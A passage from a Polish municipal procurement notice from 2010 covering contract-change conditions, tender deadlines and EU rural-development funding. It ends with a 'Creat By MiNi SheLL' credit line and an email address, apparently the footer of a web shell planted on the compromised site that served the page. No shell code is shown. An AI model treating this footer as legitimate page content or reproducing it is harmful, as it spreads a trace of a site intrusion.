w dokumentacji uniemożliwi lub istotnie wstrzyma realizację robót zmianie ulegnie odpowiednio sposób i termin realizacji robót. 
2) jeżeli zaistnieje niemożliwa do przewidzenia w momencie zawarcia umowy okoliczność prawna, ekonomiczna lub techniczna za którą żadna ze stron nie ponosi odpowiedzialności skutkująca brakiem możliwości należytego i terminowego wykonania umowy zmianie ulegnie sposób i termin realizacji zamówienia.
3) jeżeli warunki atmosferyczne nie będą pozwalały na wykonanie przedmiotu umowy ze względów technologicznych, a ich wykonanie w takich warunkach miałoby wpływ na gorszą jakość wykonanych robót zmianie ulegnie sposób i termin wykonania robót;  
4) na skutek działania siły wyższej zaistnieje konieczność zmiany terminu wykonania zamówienia.
5) jeżeli zaistnieją okoliczności leżące po stronie zamawiającego w szczególności spowodowane sytuacją finansową, zdolnościami płatniczymi, warunkami organizacyjnymi lub okolicznościami, które nie były możliwe do przewidzenia w chwili zawarcia umowy - zmianie może ulec sposób i terminy realizacji robót.
6) jeżeli na skutek ujawnienia przeszkód w gruncie i budynku lub błędów w dokumentacji projektowej konieczne będą roboty zamienne i zaniechane korzystne dla zamawiającego na etapie realizacji umowy lub przynoszące korzystne skutki w trakcie eksploatacji przedmiotu umowy lub jeżeli zamawiający zrezygnuje z realizacji części przedmiotu umowy zmianie może ulec sposób i termin
realizacji robót oraz wynagrodzenie wykonawcy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ugw.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> siedziba zamawiającego ul. Mickiewicza 21, 87-200 Wąbrzeźno, I piętro pokój nr 106.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.03.2010 godzina 09:00, miejsce: siedziba zamawiającego ul Mickiewicza 21, 87-200 Wąbrzeźno, I piętro pokój nr 101 (sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> projekt finansowany z programu Rozwoju Obszarów Wiejskich na lata 2007 -2013, działanie 4.1/413 Wdrażanie Lokalnych Strategii Rozwoju - dla operacji, które odpowiadają warunkom przyznania pomocy w ramach działania Odnowa i Rozwój Wsi.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com